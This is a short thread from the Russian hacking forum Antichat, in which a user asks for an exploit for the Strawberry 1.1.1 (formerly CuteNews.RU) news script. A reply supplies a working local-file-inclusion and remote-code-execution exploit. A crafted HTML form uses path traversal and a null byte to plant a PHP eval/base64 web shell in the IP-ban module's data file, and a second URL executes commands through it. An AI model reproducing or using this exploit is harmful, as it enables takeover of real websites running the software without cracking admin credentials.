Форум АНТИЧАТ - Есть ли сплоит для Strawberry 1.1.1 ?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Есть ли сплоит для Strawberry 1.1.1 ? (https://forum.antichat.xyz/showthread.php?t=25559)

Есть ли сплоит для Strawberry 1.1.1 ?

Народ,пожалуйста помогите найти сплоит для Strawberry 1.1.1, или хотябы описание уязвимостей....

Если я неправ поправьте.
Это названия версии движка было недавно переминовано с CuteNews на Strawberry.

Strawberry
Теперь новостной скрипт CuteNews.RU называется Strawberry!

Нет...ты не ошибаешься...все именно так...

StrawBerry 1.1.1 LFI / Remote Code Execution Exploit

Развивая тему _http://forum.antichat.ru/showpost.php?p=953944&postcount=71

Выполняем POST-запрос:

Код:

<form method="post" action="http://localhost/strawberry/example/index.php?do=../../../../../inc/mod/ipban.mdu%00">

<input type="text" name="add_ip" value="<h1><?php eval(base64_decode($_GET[cmd]));?></h1>">

<input type="hidden" name="action" value="add">

<input type="hidden" name="mod" value="ipban">

<input type="submit" value="First time">

</form>

Шелл: http://localhost/strawberry/example/index.php?cmd=cGhwaW5mbygpOw==&do=../../../../db/base/ipban.MYD%00

+ Не нужно расшифровывать md5(md5()) хеш админа.

Уточнение: "/example/" - это не пример каталога, а папка в движке StrawBerry.